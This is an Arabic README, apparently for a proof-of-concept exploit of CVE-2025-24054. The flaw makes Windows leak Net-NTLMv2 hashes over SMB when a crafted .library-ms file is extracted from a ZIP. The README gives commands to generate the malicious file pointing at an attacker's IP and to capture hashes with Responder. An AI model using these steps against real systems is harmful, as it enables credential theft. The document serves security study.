
استغلال إثبات المفهوم لـ CVE-2025-24054، ثغرة كشف تجزئة NTLM في مكتبات Windows (.library-ms). يولد ملف .library-ms خبيثًا لتسريب تجزئات Net-NTLMv2 عبر SMB عند استخراجه من أرشيف ZIP.
إثبات مفهوم بسيط لثغرة CVE-2025-24054 – كشف هاش NTLM في Windows Library (.library-ms).
⚠️ للاستخدام التعليمي والمختبري المصرح به فقط
تسمح الثغرة CVE-2025-24054 للمهاجم بإجبار نظام Windows على تسريب هاش Net-NTLMv2 الخاص بالضحية باستخدام ملف .library-ms مصمم خصيصًا.
عندما يقوم الضحية باستخراج ملف ZIP يحتوي على ملف .library-ms الخبيث، يبدأ مستكشف Windows تلقائيًا اتصال SMB، مما يؤدي إلى تسريب هاش NTLM.
.library-ms خبيث يحتوي على مسار UNC يشير إلى جهازه.
python poc.py -i YOUR-IP
sudo responder -I eth0